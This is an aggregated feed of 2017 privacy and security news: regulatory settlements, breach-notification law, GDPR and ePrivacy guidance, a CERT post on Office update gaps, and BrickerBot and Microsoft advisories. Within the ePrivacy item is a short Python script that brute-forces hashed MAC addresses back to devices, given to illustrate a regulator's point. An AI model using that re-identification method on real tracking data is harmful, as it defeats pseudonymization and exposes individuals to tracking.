On April 12, 2017, the U.S. Department of Health and Human Services’ Office for Civil Rights (“OCR”) entered into a resolution agreement with Metro Community Provider Network (“MCPN”) that stemmed from MCPN’s lack of a risk analysis and risk management plan that addressed risks and vulnerabilities to protected health information (“PHI”).

In January 2012, MCPN submitted a breach report to OCR indicating that it had suffered a breach following a phishing incident that affected 3,200 patients. OCR investigated MCPN and found that, while MCPN had taken corrective action following the incident, it had failed to conduct a risk analysis until February 2012 or implement a risk management plan. In addition, the risk analysis MCPN eventually conducted was deemed “insufficient to meet the requirements of the Security Rule.”

The resolution agreement requires MCPN to pay $400,000 to OCR and enter into a Corrective Action Plan that obligates MCPN to:

  • conduct a risk analysis and submit it to OCR for review and approval;
  • implement a risk management plan to address and mitigate the risks and vulnerabilities identified in the risk analysis;
  • revise its policies and procedures based on the findings of the risk analysis;
  • review and revise its HIPAA training materials;
  • report any events of noncompliance with its HIPAA policies and procedures; and
  • submit annual compliance reports for a period of three years.

In the settlement with MCPN, OCR balanced MCPN’s HIPAA violations with its status as a federally qualified health center that provides medical care to patients who have incomes at or below the poverty level. OCR Director Roger Severino stated that “Patients seeking health care trust that their providers will safeguard and protect their health information. Compliance with the HIPAA Security Rule helps covered entities meet this important obligation to their patient communities.”

Privacy Compliance Company Agrees to a Settlement with the New York Attorney General

On April 6, 2017, New York Attorney General Eric T. Schneiderman announced that privacy compliance company TRUSTe, Inc., agreed to settle allegations that it failed to properly verify that customer websites aimed at children did not run third-party software to track users. According to Attorney General Schneiderman, the enforcement action taken by the NY AG is the first to target a privacy compliance company over children’s privacy.

TRUSTe was certified by the FTC to operate a Children’s Online Privacy Protection Act (“COPPA”) safe harbor program, under which companies could use its COPPA services to demonstrate compliance with the law. The NY AG alleged that TRUSTe failed to run scans of “most or all” of its 32 customers’ websites for third-party tracking technology on the children’s webpages of those websites. The NY AG further alleged that TRUSTe “failed to make a reasonable determination as to whether third-party tracking technologies present on clients’ websites violated COPPA, certifying child-directed websites despite information indicating that third parties present on those websites collected and used the personal information of users in a manner prohibited by COPPA.”

Under the terms of the settlement, TRUSTe agreed to pay $100,000 and “adopt new measures to strengthen its privacy assessments,” including (1) conducting an annual review of the information policies, practices and representations of each customer that participates in its COPPA safe harbor program; (2) requiring customers to conduct comprehensive internal assessments of their practices relating to information collection and use and (3) providing regular training to individuals responsible for performing assessments within the COPPA safe harbor program.

New Mexico Enacts Data Breach Notification Law

On April 6, 2017, New Mexico became the 48th state to enact a data breach notification law, leaving Alabama and South Dakota as the two remaining states without such requirements. The Data Breach Notification Act (H.B. 15) goes into effect on June 16, 2017.

Key Provisions of New Mexico’s Data Breach Notification Act:

  • The definition of “personal identifying information” includes biometric data, defined as an individual’s “fingerprints, voice print, iris or retina patterns, facial characteristics or hand geometry that is used to uniquely and durably authenticate an individual’s identity when the individual accesses a physical location, device, system or account.”
  • The law applies to unencrypted computerized data or encrypted computerized data when the encryption key or code is also compromised.
  • Notice to the New Mexico Office of the Attorney General and the major consumer reporting agencies is required if more than 1,000 New Mexico residents are notified.
  • Notice must be made to New Mexico residents (and the Attorney General and Consumer Reporting agencies if over 1,000 residents are notified) within 45 calendar days of discovery of a security breach.
    • Third-party service providers are also required to notify the data owner or licensor within 45 days of discovery of a data breach.
  • Notification is not required if, after an appropriate investigation, it is determined that the security breach does not give rise to a significant risk of identity theft or fraud.
  • Entities that are subject to the Gramm-Leach-Bliley Act or HIPAA are exempt from the statute.
  • The law also contains a data disposal provision that requires data owners or licensors to shred, erase or otherwise make unreadable personal identifying information contained in records when it is no longer “reasonably needed” for business purposes.
  • In addition, the law requires data owners and licensors to implement and maintain reasonable security procedures and practices designed to protect the personal identifying information from unauthorized access, destruction, use, modification or disclosure.
    • Contracts with third-party service providers must require that the service provider implement and maintain such security procedures and practices.

CIPL Issues Discussion Paper on GDPR Certifications

On April 12, 2017, the Centre for Information Policy Leadership (“CIPL”) at Hunton & Williams LLP issued a discussion paper on Certifications, Seals and Marks under the GDPR and Their Roles as Accountability Tools and Cross-Border Data Transfer Mechanisms (the “Discussion Paper”). The Discussion Paper sets forth recommendations concerning the implementation of the EU General Data Protection Regulation’s (“GDPR’s”) provisions on the development and use of certification mechanisms. The GDPR will become effective on May 25, 2018. The EU Commission, the Article 29 Working Party, individual EU data protection authorities (“DPAs”) and other stakeholders have begun to consider the role of GDPR certifications and how to develop and implement them. CIPL’s Discussion Paper is meant as formal input to that process.

Certifications, seals and marks have the potential to play a significant role in enabling companies to achieve and demonstrate organizational accountability and GDPR compliance for some or all of their services, products or activities. The capability of certifications to provide a comprehensive GDPR compliance structure will be particularly useful for small and medium-sized enterprises. For large and multinational companies, certifications may facilitate business arrangements with business partners and service providers. In addition, certifications, seals and marks can be used as accountable, safe and efficient cross-border data transfer mechanisms under the GDPR, provided they are coupled with binding and enforceable commitments. Finally, there is potential for creating interoperability with other legal regimes, as well as with similar certifications, seals and marks in other regions. Thus, as explained in the Discussion Paper, certifications may present real benefits for all stakeholders, including individuals, organizations and DPAs.

To reap the full benefit of certifications, however, according to CIPL, it is crucial that certifications are efficiently operated, incentivized and clearly accompanied by benefits for certified organizations. Otherwise, organizations will be reluctant to invest time and money in obtaining and maintaining GDPR certifications.

The Discussion Paper contains the following “Top Ten” messages:

  • Certification should be available for a product, system, service, particular process or an entire privacy program.
  • There is a preference for a common EU GDPR baseline certification for all contexts and sectors, which can be differentiated in its application by different certification bodies during the certification process.
  • The EU Commission and/or the European Data Protection Board (“EDPB”), in collaboration with certification bodies and industry, should develop the minimum elements of this common EU GDPR baseline certification, which may be used directly, or to which specific other sectoral or national GDPR certifications should be mapped.
  • The differentiated application of the common EU GDPR certification for specific sectors may be informed by sector-specific codes of conduct.
  • Overlap and proliferation of certifications should be avoided so as not to create consumer/stakeholder confusion or make it less attractive for organizations seeking certification.
  • Certifications must be adaptable to different contexts, scalable to the size of the company and nature of the processing, and affordable.
  • GDPR certifications must be consistent with, and take into account, other certification schemes and be able to interact with or be as interoperable as possible (this includes ISO/IEC Standards, the EU-U.S. and Swiss-U.S. Privacy Shield frameworks, APEC CBPR and the Japan Privacy Mark).
  • The EU Commission and/or the EDPB should prioritize developing a common EU GDPR certification for purposes of data transfers pursuant to Article 46(2)(f).
  • Organizations should be able to leverage their BCR approvals to receive or streamline certification under an EU GDPR certification.
  • DPAs should incentivize and publicly affirm certifications as a recognized means to demonstrate GDPR compliance, and as a mitigating factor in case of enforcement, subject to the possibility of review of specific instances of noncompliance.

The Discussion Paper was developed in the context of CIPL’s ongoing GDPR Implementation Project, a multi-year initiative involving research, workshops, webinars and white papers, supported by over 70 private sector organizations, with active engagement and participation by many EU-based data protection and governmental authorities, academics and other stakeholders.

Battery Backup PSA

One of the better things you can do to protect the money you spend on electronic devices is to have a good surge protector and battery backup. If you’re like me, you only buy the kind where you can disable the audible alarms. The problem with this is that now you might not get any warning if the battery goes bad.

In some cases you’ll have the battery backup connected to a computer via USB and receive notices that way.  But in other cases where the battery backup is protecting home entertainment equipment, your cable modem or your router, you might not know you have a problem until you happen to be home during a power hit.   Imagine how many times your equipment may have taken a hit that you didn’t know about.

The battery backup I just purchased says the battery is good for about three years. So put it on your calendar. If your battery backup has a visual indicator that it’s broken, check that. And you may want to use the software that comes with the battery backup to connect to each unit and manually run a self test (consult your own UPS manual about the best way to do that).

The post Battery Backup PSA appeared first on Roger's Information Security Blog.

Enterprise Security Weekly #40 – Huge, Gaping Hole

Gabriel Gumbs of STEALTHbits joins us for an interview. In the news, virtualization-based security, the road to Twistlock 2.0, Trend Micro embraces machine learning, and more in this episode of Enterprise Security Weekly!Full show notes: http://wiki.securityweekly.com/wiki/index.php/ES_Episode40 Visit http://www.securityweekly.com for all the latest episodes!

Working Party Releases Guidelines on Data Protection Impact Assessments Under the GDPR

On April 4, 2017, the Article 29 Working Party (“Working Party”) adopted its draft Guidelines on Data Protection Impact Assessment and determining whether processing is “likely to result in a high risk” for the purposes of Regulation 2016/679 (the “Guidelines”). The Guidelines aim to clarify when a data protection impact assessment (“DPIA”) is required under the EU General Data Protection Regulation (“GDPR”). The Guidelines also provide criteria to Supervisory Authorities (“SAs”) to use to establish their lists of processing operations that will be subject to the DPIA requirement.

The Guidelines further explain the DPIA requirement and provide a few recommendations:

  • Scope of a DPIA. The Working Party confirms that a single DPIA may involve a single data processing operation or a set of similar processing operations (i.e., with respect to the risks they present).
  • Processing operations that are subject to a DPIA. The Working Party reiterates that a DPIA is mandatory where processing is likely to result in a high risk to the rights and freedoms of individuals. The Working Party highlights several criteria to be taken into consideration by SAs when establishing their lists of the kinds of processing activities that require a DPIA, including (1) evaluation or scoring, including profiling and predicting, (2) automated decision-making by the data controller with legal or similar significant effects on the individuals, (3) systematic monitoring of individuals, (4) processing personal data on a large scale and (5) matching or combining datasets. According to the Working Party, the more criteria that are met, the more likely it is that such processing activities present a high risk for the individuals and therefore require a DPIA. The assessment of certain data processing operation risks, however, must still be made on a case-by-case basis. The Guidelines further outline cases where a DPIA would not be required, including, for example, where the processing is not likely to result in a high risk to the rights and freedoms of individuals, or a DPIA has already been conducted for similar data processing operations. In addition, according to the Working Party, a DPIA must be reviewed periodically, and in particular, when there is a change in the risks presented by the processing operations. Finally, the Working Party specifies that the DPIA requirement contained in the GDPR applies to processing operations initiated after the GDPR becomes applicable (i.e., as of May 25, 2018), although it recommends that data controllers anticipate the GDPR and carry out DPIAs for processing operations already underway.
  • How to carry out a DPIA. Where a likely high risk processing is identified, the Working Party recommends that the DPIA be carried out prior to the processing, and as early as possible in the design of the processing operation. Also, the data controller is responsible to ensure that a DPIA is carried out. The data controller must, however, cooperate with and ask the advice of the data protection officer. In addition, the data processor must assist the data controller in carrying out the DPIA when it is involved in the processing. Further, the Guidelines reiterate that data controllers have some flexibility in determining the structure and form of a DPIA. In this respect, Annex 2 of the Guidelines provides a list of criteria for data controllers to use to assess whether or not a DPIA, or a methodology to carry out a DPIA, is sufficiently comprehensive to comply with the GDPR. Finally, the Working Party recommends that data controllers publish their DPIAs, although this is not a strict requirement under the GDPR.
  • Consultation of SAs. The Working Party reiterates that data controllers must consult SAs when they cannot find sufficient measures to mitigate the risks of a processing and the residual risks are still high, as well as in specific cases where required by EU Member State law.
  • Conclusion and Recommendations. Finally, the Working Party reiterates the importance of DPIAs as a GDPR compliance tool, in particular where high risk data processing is planned or is taking place. Whenever a likely high risk processing is identified, the Working Party recommends that data controllers: (1) choose a DPIA methodology or specify and implement a systematic DPIA process, (2) provide the DPIA report to the competent SA where required, (3) consult the SA where required, (4) periodically review the DPIA and (5) document the decisions taken in the context of the DPIA.

Annex 1 of the Guidelines contains some examples of existing DPIA frameworks, including the ones published by the Spanish, French, German and UK SAs.

The Working Party will accept comments on the draft Guidelines until May 23, 2017.

Massachusetts AG Settles Geofencing Case

On April 4, 2017, the Massachusetts Attorney General’s office announced a settlement with Copley Advertising LLC (“Copley”) in a case involving geofencing.

Copley used geolocation technology to create a virtual fence around women’s reproductive healthcare facilities. Once the women crossed the virtual fence, Copley then sent targeted advertisements to the women’s phones or other mobile devices. The ads contained messages such as “Pregnancy Help” or “You Have Choices,” and linked to websites with information about alternatives to abortion. Women could also have a live chat with a “pregnancy support specialist.”

The Massachusetts AG alleged that Copley’s use of geofencing violated the Massachusetts Consumer Protection Act because it tracked consumers’ locations and disclosed them to third-party advertisers to target consumers with “potentially unwanted advertising based on inferences about [their] private, sensitive, and intimate medical or physical condition.”

The Assurance of Discontinuance requires Copley to agree to neither directly nor indirectly geofence “the [v]icinity of any Medical Center located in Massachusetts to infer the health status, medical condition or medical treatment of any person.”

In announcing the settlement, Attorney General Healey stated that “[c]onsumers are entitled to privacy in their medical decisions and conditions. This settlement will help ensure that consumers in Massachusetts do not have to worry about being targeted by advertisers when they seek medical care.”

The Twisty Maze of Getting Microsoft Office Updates

While investigating the fixes for the recent Microsoft Office OLE vulnerability, I encountered a situation that led me to believe that Office 2016 was not properly patched. However, after further investigation, I realized that the update process of Microsoft Update has changed. If you are not aware of these changes, you may end up with a Microsoft Office installation that is missing security updates. With the goal of preventing others from making similar mistakes as I have, I outline in this blog post how the way Microsoft Office receives updates has changed.

The Bad Old Days

Let's go back about 15 years in Windows computing to the year 2002. You've got a shiny new desktop with Windows XP and Office XP as well. If you knew where the option was in Windows, you could turn on Automatic Updates to download and notify you when OS updates are made available. What happens when there is a security update for Office? If you happened to know about the OfficeUpdate website, you could run an ActiveX control to check for Microsoft Office updates. Notice that the Auto Update link is HTTP instead of HTTPS. These were indeed dark times. But we had Clippy to help us through it!

officexp_clippy.png

Microsoft Update: A New Hope

Let's fast-forward to the year 2005. We now have Windows XP Service Pack 2, which enables a firewall by default. Windows XP SP2 also encourages you to enable Automatic Updates for the OS. But what about our friend Microsoft Office? As it turns out, an enhanced version of Windows Update, called Microsoft Update, was also released in 2005. The new Microsoft Update, instead of checking for updates for only the OS itself, now also checks for updates for other Microsoft software, such as Microsoft Office. If you enabled this optional feature, then updates for Microsoft Windows and Microsoft Office would be installed.

Microsoft Update in Modern Windows Systems

Enough about Windows XP, right? How does Microsoft Update factor into modern, supported Windows platforms? Microsoft Update is still supported through current Windows 10 platforms. But in each of these versions of Windows, Microsoft Update continues to be an optional component, as illustrated in the following screen shots for Windows 7, 8.1, and 10.

Windows 7

win7_windows_update.png

win7_microsoft_update.png

Once this dialog is accepted, we can now see that Microsoft Update has been installed. We will now receive updates for Microsoft Office through the usual update mechanisms for Windows.

win7_microsoft_update_installed.png

Windows 8.1

Windows 8.1 has Microsoft Update built-in; however, the option is not enabled by default.

win8_microsoft_update.png

Windows 10

Like Windows 8.1, Windows 10 also includes Microsoft Update, but it is not enabled by default.

win10_microsoft_update.png

Microsoft Click-to-Run

Microsoft Click-to-Run is a feature where users "... don't have to download or install updates. The Click-to-Run product seamlessly updates itself in the background." The Microsoft Office 2016 installation that I obtained through MSDN is apparently packaged in Click-to-Run format. How can I tell this? If you view the Account settings in Microsoft Office, a Click-to-Run installation looks like this:

office16_about.png

Additionally, you should notice a process called OfficeClickToRun.exe running:

procmon-ctr.png

Microsoft Office Click-to-Run and Updates

The interaction between a Click-to-Run version of Microsoft Office and Microsoft Updates is confusing. For the past dozen years or so, when a Windows machine completed running Microsoft Update, you could be pretty sure that Microsoft Office was up to date. As a CERT vulnerability analyst, my standard process on a Microsoft patch Tuesday was to restore my virtual machine snapshots, run Microsoft Update, and then consider that machine to have fully patched Microsoft software.

I first noticed a problem when my "fully patched" Office 2016 system still executed calc.exe when I opened my proof-of-concept exploit for CVE-2017-0199. Only after digging into the specific version of Office 2016 that was installed on my system did I realize that it did not have the April 2017 update installed, despite having completed Microsoft Update and rebooting. After setting up several VMs with Office 2016 installed, I was frequently presented with a screen like this:

office2016_no_updates_smaller.png

The problem here is obvious:

  • Microsoft Update is indicating that the machine is fully patched when it isn't.
  • The version of Office 2016 that is installed is from September 2015, which is outdated.
  • The above screenshot was taken on May 3, 2017, yet it reports that no updates are available, even though updates had been released by that date.

I would love to have determined why my machines were not automatically retrieving updates. But unfortunately there appear to be too many variables at play to pinpoint the issue. All I can conclude is that my Click-to-Run installations of Microsoft Office did not receive updates for Microsoft Office 2016 until as late as 2.5 weeks after the patches were released to the public. And in the case of the April 2017 updates, there was at least one vulnerability that was being exploited in the wild, with exploit code being publicly available. This amount of time is a long window of exposure.

It is worth noting that the manual update button within the Click-to-Run Office 2016 installation does correctly retrieve and install updates. The problem I see here is that it requires manual user interaction to be sure that your software is up to date. Microsoft has indicated to me that this behavior is by design:

[Click-to-Run] updates are pushed automatically through gradual rollouts to ensure the best product quality across the wide variety of devices and configurations that our customers have.

Personally, I wish that the update paths for Microsoft Office were more clearly documented.

Update: April 11, 2018

Microsoft Office Click-to-Run updates are not necessarily released on the official Microsoft "Patch Tuesday" dates. For this reason, Click-to-Run Office users may have to wait additional time to receive security updates.

Conclusions and Recommendations

To prevent this problem from happening to you, I recommend that you do the following:

  • Enable Microsoft Update to ensure that you receive updates for software beyond just the core Windows operating system. This switch can be automated using the technique described here: https://msdn.microsoft.com/en-us/aa826676.aspx (a minimal scripted sketch of this opt-in appears after this list).
  • If you have a Click-to-Run version of Microsoft Office installed, be aware that it will not receive updates via Microsoft Update.
  • If you have a Click-to-Run version of Microsoft Office and want to ensure timely installation of security updates, manually check for updates rather than relying on the automatic update capability of Click-to-Run.
  • Enterprise customers should refer to Deployment guide for Office 365 ProPlus to ensure that updates for Click-to-Run installations meet their security compliance timeframes.
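
As a rough illustration of the opt-in technique referenced in the first recommendation above, the VBScript approach from that MSDN article can be translated into Python via pywin32. This is a minimal sketch, not production tooling: the service GUID is the published Microsoft Update identifier, the flag value mirrors the MSDN sample, and the client label is made up. Run it from an elevated prompt.

```python
import win32com.client  # requires pywin32

# Published service ID for Microsoft Update (from the MSDN opt-in sample).
MICROSOFT_UPDATE_SERVICE_ID = "7971f918-a847-4430-9279-4a52d1efe18d"

service_manager = win32com.client.Dispatch("Microsoft.Update.ServiceManager")
service_manager.ClientApplicationID = "opt-in-sketch"  # arbitrary, hypothetical label

# 7 = allow pending registration | allow online registration | register with Automatic Updates
service_manager.AddService2(MICROSOFT_UPDATE_SERVICE_ID, 7, "")
print("Machine is now opted in to Microsoft Update.")
```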

Working Party Adopts Opinion on Proposed ePrivacy Regulation

On April 4, 2017, the Article 29 Working Party (the “Working Party”) adopted an Opinion on the Proposed Regulation of the European Commission for the ePrivacy Regulation (the “Proposed ePrivacy Regulation”). The Proposed ePrivacy Regulation is intended to replace the ePrivacy Directive and to increase harmonization of ePrivacy rules in the EU. A regulation is directly applicable in all EU Member States, while a directive requires transposition into national law. 

The Working Party welcomes the Proposed ePrivacy Regulation and outlines some points of concern that should be addressed during the legislative process, which is intended to be completed by May 2018, when the EU General Data Protection Regulation (“GDPR”) takes effect.

Key Aspects of the Proposed ePrivacy Regulation

  • Consistency with the GDPR. The Working Party welcomes the fact that the same authority responsible for monitoring compliance with the GDPR will also be responsible for the enforcement of the Proposed ePrivacy Regulation and will be able to impose similar fines. Furthermore, the Working Party favors the removal of the existing sector-specific data breach notification rules in the ePrivacy context, consistent with the GDPR’s general data breach notification rule applicable to all sectors.
  • Extended Scope. The Working Party welcomes the expansion of the Proposed ePrivacy Regulation to include Over-The-Top providers in addition to traditional telecom operators. Moreover, the Working Party favors the clarification that the Proposed ePrivacy Regulation covers machine-to-machine interaction as well as content and associated metadata. The Opinion also favors the recognition of the importance of anonymization, the broad formulation of the protection of terminal equipment and the inclusion of legal persons in the scope of the Proposed ePrivacy Regulation.
  • Consent. The Working Party welcomes the clarification that Internet access and mobile telephony are essential services and that providers of these services cannot “force” their customers to consent to any data processing unnecessary for the provision of these services. According to the Working Party, given people's dependence on these essential services, consent for the processing of their communications for additional purposes (such as advertising and marketing) is not valid. In addition, the Working Party approves the harmonization of the consent requirement for including personal data of natural persons in directories. Finally, the Working Party appreciates that the prohibition on collecting information from end-users' terminal equipment does not apply in cases of measuring web traffic under certain conditions.

Points of Concern

  • WiFi tracking. According to the Working Party, the obligations in the Proposed ePrivacy Regulation for tracking the location of terminal equipment should comply with the GDPR requirements. Specifically, the Working Party notes that MAC addresses are personal data, even after security measures such as hashing have been applied (a short sketch after this list illustrates why hashing alone does not anonymize a MAC address). Depending on the purpose of the data collection, the Working Party notes that tracking under the GDPR is likely either to be subject to consent, or may be performed if the collected personal data is anonymized (preferably immediately after collection). Finally, the Working Party invites the European Commission to promote a technical standard for mobile devices to automatically signal an objection against such tracking.
  • Analysis of content and metadata. The Working Party appreciates the recognition that metadata may reveal very sensitive data and that analysis of content is high-risk processing. According to the Working Party, it should be prohibited to process content and metadata of communications without the consent of both sender and recipient, except for specific purposes permitted by the Proposed ePrivacy Regulation, including security and billing purposes, as well as spam filtering purposes. To that end, the Working Party recommends that the Proposed ePrivacy Regulation also permit the processing of content and metadata of communications for purely household usage as well as for individual work-related usage. According to the Working Party, the analysis of content and metadata of communications for all other purposes, such as analytics, profiling, behavioral advertising or other commercial purposes, should require consent from all end-users.
  • Tracking walls. The Working Party advocates that the Proposed ePrivacy Regulation should include an explicit prohibition of tracking walls (i.e., the practice whereby access to a website or service is denied unless individuals agree to be tracked on other websites or services). According to the Working Party, such “take it or leave it” approaches are rarely legitimate. The Working Party also recommends that access to content on websites and apps should not be made conditional on the acceptance of intrusive processing activities, such as cookies, device fingerprinting, injection of unique identifiers or other monitoring techniques.
  • Privacy by default regarding terminal equipment and software. The Working Party recommends that terminal equipment and software must, by default, “offer privacy protective settings, and offer clear options to users to confirm or change these default settings during installation.” The Working Party recommends that users have the ability to provide consent through their browser settings and have the option to opt-in to Do Not Track.
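
To illustrate the Working Party's point about hashed MAC addresses (see the WiFi tracking item above), the following is a minimal sketch of why an unsalted hash does not anonymize a MAC: behind a single known vendor prefix there are only 2^24 possible addresses, few enough to enumerate by brute force. The prefix and address used here are hypothetical.

```python
import hashlib
from itertools import product

def hash_mac(mac: str) -> str:
    """Unsalted SHA-256 of a MAC address string (the 'pseudonymized' value a tracker might store)."""
    return hashlib.sha256(mac.encode()).hexdigest()

target = hash_mac("f0:99:bf:12:34:56")  # hypothetical device the tracker observed
oui = "f0:99:bf"                        # hypothetical vendor prefix (OUI)

# Exhaustively try all 2^24 addresses behind that prefix -- slow in pure
# Python but entirely feasible, which is the point.
for a, b, c in product(range(256), repeat=3):
    candidate = f"{oui}:{a:02x}:{b:02x}:{c:02x}"
    if hash_mac(candidate) == target:
        print("Recovered MAC:", candidate)
        break
```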

The Working Party also made additional recommendations with regard to clarifying the Proposed ePrivacy Regulation’s extraterritorial scope, the conditions for obtaining granular consent through browser settings and including behavioral advertisements in the direct marketing rules. Finally, the Working Party discussed several other issues that should be clarified to ensure legal certainty, such as the conditions for the employer’s interference with company-issued devices.

Read the Opinion of the Article 29 Working Party.

Working Party Adopts Revised Guidelines on Data Portability, DPOs and Lead SA

On April 5, 2017, the Article 29 Working Party (“Working Party”) adopted the final versions of its guidelines (the “Guidelines”) on the right to data portability, Data Protection Officers (“DPOs”) and Lead Supervisory Authority (“SA”), which were first published for comment in December 2016. The final publication of these revised guidelines follows the public consultation which ended in February 2017.

The amendments and additions made to the first version of the Guidelines on DPOs include the following points:

  • pursuant to the Guidelines, a DPO, whether mandatory or voluntary, is designated for all the processing activities carried out by the data controller or the data processor;
  • to ensure the DPO’s accessibility, the Working Party recommends that the DPO be located within the EU, whether or not the controller or the processor is established in the EU;
  • the Working Party recalls that the DPO must take the role of “facilitator” and act as a contact point to provide the competent SA with the documents and information it needs for the performance of its tasks, as well as for the exercise of its investigative, corrective, authorization and advisory powers; and
  • although the DPO is bound by secrecy or confidentiality concerning the performance of its tasks, the DPO is still allowed to contact and seek advice from the SA.

The Working Party amended and further specified certain points of the Guidelines on the Lead SA, including the following:

  • Where one or more data controllers established in the EU jointly determine the purposes and means of the processing (i.e., joint controllers), the controllers must, in a transparent manner, determine their respective responsibilities with respect to compliance with the EU General Data Protection Regulation (“GDPR”) and, in order to benefit from the one-stop-shop, should designate which establishment will have the power to implement decisions about the processing with respect to all joint controllers—and act as the main establishment.
  • When the data controllership decision has been made and a main establishment has been designated, the lead SA can still rebut the controller’s analysis based on an objective analysis of the relevant facts and request further information regarding the data controllership structure.
  • The one-stop-shop system can also benefit data processors that are subject to the GDPR and have establishments in more than one EU Member State. Similar to data controllers, the processor’s main establishment will be the location of its central administration in the EU or, in case there is no central administration in the EU, the establishment in the EU where the main processing activities take place. However, where both the data controller and processor are involved, the competent lead SA should be the one to act as lead SA for the controller. Therefore, in practice, a data processor may have to deal with different lead SAs.

The Working Party amended and further specified certain points of the Guidelines on the right to data portability, including the following:

  • Data controllers answering data portability requests from data subjects are not responsible for the processing handled by the data subject or by another company receiving personal data. In this respect, the data controller is not responsible for the receiving data controller’s compliance with data protection law.
  • Data processors processing personal data subject to a data portability request must assist the data controller in responding to such requests.
  • Receiving data controllers are not obliged to accept and process personal data transmitted following a data portability request.
  • Data that is observed from the activities of the data subjects (e.g., activity logs, history of website usage or search activities) is in scope of the data portability right.
  • The Working Party recommends data controllers explore two complementary ways to make portable data available to data subjects or other data controllers: (1) a direct transmission of the overall dataset of portable data, and (2) an automated tool allowing extraction of relevant data. The choice between these two paths must be made on a case-by-case basis.
  • Where there is no available common use format in a certain industry or context, data controllers should provide personal data using commonly used open formats, along with the related metadata.
  • When it comes to ensuring the security of personal data transmitted, data controllers should implement appropriate procedures to deal with potential data breaches, assess the risks linked to data portability and take appropriate risk mitigation measures (e.g., use additional authentication methods).

BrickerBot Permanent Denial-of-Service Attack (Update A)

This updated alert is a follow-up to the original alert titled ICS-ALERT-17-102-01A BrickerBot Permanent Denial-of-Service Attack that was published April 12, 2017, on the NCCIC/ICS-CERT web site. ICS-CERT is aware of open-source reports of “BrickerBot” attacks, which exploit hard-coded passwords in IoT devices in order to cause a permanent denial of service (PDoS). This family of botnets, which consists of BrickerBot.1 and BrickerBot.2, was described in a Radware Attack Report.

China Publishes Draft Measures for Security Assessments of Data Transfers

The Cybersecurity Law of China, which was passed in November 2016, introduced a data localization requirement obliging “operators of key information infrastructure” to retain, within China, critical data and personal information which they collect or generate in the course of operating their business in China. If an entity has a genuine business need to transmit critical data or personal information to a destination outside of China, it can do so provided it undergoes a “security assessment.”

On April 11, 2017, the Cyberspace Administration of China published a draft of its proposed Measures for the Security Assessment of Outbound Transmission of Personal Information and Critical Data (the “Draft”). The Draft provides further guidance on how the security assessments might be carried out. The general public may comment on the Draft until May 11, 2017. At this point, the Draft has only been published for comment and does not constitute a final regulation. However, it represents a real possibility of what the final regulation could require.

The Draft would extend the data localization requirement from “operators of key information infrastructure” to all “network operators.” The definition of “network operator” under the Draft remains consistent with the definition given under the Cybersecurity Law, which refers to an owner or an administrator of a computerized information network system, or a network service provider. This means that all “network operators” will also be required to store, within the territory of China, personal information and critical data which they collect or generate in the course of operating their business in China, and to undergo a security assessment if they have a business need to transmit data outside of China.

The Draft has divided the security assessment into two types, self-assessments and assessments conducted by the competent authority. In general, a “network operator” has to conduct a self-assessment before transmitting critical data or personal information abroad, and will remain responsible for the result of its assessment. However, a security assessment must be submitted to and conducted by the competent authority under the following circumstances: (1) the outbound data transfer involves the personal information of over 500,000 individuals; (2) the data size is over 1,000 GB; (3) the transfer involves data in relation to nuclear facilities, chemistry and biology, national defense and the military, population health, megaprojects, the marine environment or sensitive geographic information; (4) the transfer involves data relating to information about the cybersecurity of key information infrastructure, such as system vulnerabilities and security protection; (5) the outbound transfer of personal information and critical data is conducted by an operator of key information infrastructure; or (6) the outbound data transfer may affect the national security or the public interest.

“Personal information” is already defined in the Cybersecurity Law itself as information that is recorded by electronic or other methods and that can, on its own or in combination with other information, distinguish the identity of a natural person. “Critical data” is defined in the Draft as data which is very closely related to national security, economic development and the social and public interests, but the concrete scope is to be further elaborated upon in relevant national standards and separate guidance documents.

Under the Draft, a security assessment would focus on the following factors: (1) the necessity of the outbound transfer; (2) the quantity, scope, type and sensitivity of the personal information and critical data to be transferred; (3) the security measures and capabilities of the data recipient, as well as the cybersecurity environment of the nation where the data recipient is resident; (4) the risk of leakage, damage or abuse of the data after the outbound transfer; and (5) possible risks to national security, the public interest and individuals' legal rights posed by the outbound data transfer and data aggregation.

When transferring personal information, network operators are required to expressly explain to the data subject the purpose, scope, content, recipient and the nation where the recipient is resident, and obtain the consent of the data subject. An outbound data transfer is prohibited without the consent of a data subject, or when the transfer may infringe upon the interests of the individual. Outbound transfers of a minor’s personal information must be consented to by the minor’s guardian.

An outbound data transfer will also be prohibited if the transfer would bring risks to the security of the national political system, economy, science and technology or national defense, or if the transfer could affect national security or jeopardize the public interest.

MS16-037 – Critical: Cumulative Security Update for Internet Explorer (3148531) – Version: 2.0

Severity Rating: Critical
Revision Note: V2.0 (April 11, 2017): Bulletin revised to announce the release of a new Internet Explorer cumulative update (4014661) for CVE-2016-0162. The update adds to the original release to comprehensively address CVE-2016-0162. Microsoft recommends that customers running the affected software install the security update to be fully protected from the vulnerability described in this bulletin. See Microsoft Knowledge Base Article 4014661 for more information.
Summary: This security update resolves vulnerabilities in Internet Explorer. The most severe of the vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker who successfully exploited the vulnerabilities could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

MS17-014 – Important: Security Update for Microsoft Office (4013241) – Version: 2.0

Severity Rating: Important
Revision Note: V2.0 (April 11, 2017): To comprehensively address CVE-2017-0027 for Office for Mac 2011 only, Microsoft is releasing security update 3212218. Microsoft recommends that customers running Office for Mac 2011 install update 3212218 to be fully protected from this vulnerability. See Microsoft Knowledge Base Article 3212218 for more information.
Summary: This security update resolves vulnerabilities in Microsoft Office. The most severe of the vulnerabilities could allow remote code execution if a user opens a specially crafted Microsoft Office file. An attacker who successfully exploited the vulnerabilities could run arbitrary code in the context of the current user. Customers whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

MS17-021 – Important: Security Update for Windows DirectShow (4010318) – Version: 2.0

Severity Rating: Important
Revision Note: V2.0 (April 11, 2017): Bulletin revised to announce that the security updates that apply to CVE-2017-0042 for Windows Server 2012 are now available. Customers running Windows Server 2012 should install update 4015548 (Security Only) or 4015551 (Monthly Rollup) to be fully protected from this vulnerability. Customers running other versions of Microsoft Windows do not need to take any further action.
Summary: This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow an Information Disclosure if Windows DirectShow opens specially crafted media content that is hosted on a malicious website. An attacker who successfully exploited the vulnerability could obtain information to further compromise a target system.

Layered Database Security in the age of Data Breaches

